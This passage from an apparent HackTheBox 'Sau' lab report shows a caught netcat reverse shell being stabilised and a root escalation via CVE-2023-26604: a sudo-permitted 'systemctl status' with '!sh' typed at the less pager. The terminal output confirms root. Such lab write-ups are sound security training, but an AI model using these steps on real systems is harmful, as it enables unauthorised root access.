puma@sau:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
puma@sau:~$ export TERM=xterm-256color
export TERM=xterm-256color
puma@sau:~$ ^Z
zsh: suspended  nc -nlvp 9090

┌──(kali㉿kali)-[~/…/Assessments/hackthebox/pwned.d/Sau]
└─$ stty raw -echo ; fg ; reset
[1]  + continued  nc -nlvp 9090
stty columns 200 rows 200
puma@sau:~$

The operating system is Ubuntu 20.04.6.

puma@sau:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.6 LTS"

The puma user has sudo permissions:

puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

Vulnerabilities

https://ubuntu.com/security/cves

CVE-2023-26604

https://ubuntu.com/security/CVE-2023-26604

systemd before version 247 does not set LESSSECURE=1 when paging output through less, so when systemctl is run via sudo, other programs can be launched from the pager with root privileges.

Exploitation of systemctl

The tester ran sudo /usr/bin/systemctl status trail.service and entered !sh at the less pager prompt, the same steps shown in the validation section earlier in this report, yielding a root shell:

# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:a0:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.129.229.26/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2323sec preferred_lft 2323sec
    inet6 dead:beef::250:56ff:feb0:a0f6/64 scope global dynamic mngtmpaddr 
       valid_lft 86395sec preferred_lft 14395sec
    inet6 fe80::250:56ff:feb0:a0f6/64 scope link 
       valid_lft forever preferred_lft forever
# hostname
sau
# cd
# ls
go  root.txt
#

Appendix

Tool Versions

Tool        Version            Source
Kali Linux  2024.2             https://www.kali.org/get-kali/
Firefox     115.12.0esr        Kali package manager
ZAP         Weekly 2024-06-17  https://www.zaproxy.org/download/
nmap        7.94SVN            Kali package manager
curl        8.8.0              Kali package manager
netcat      v1.10-48.1         Kali package manager
]]>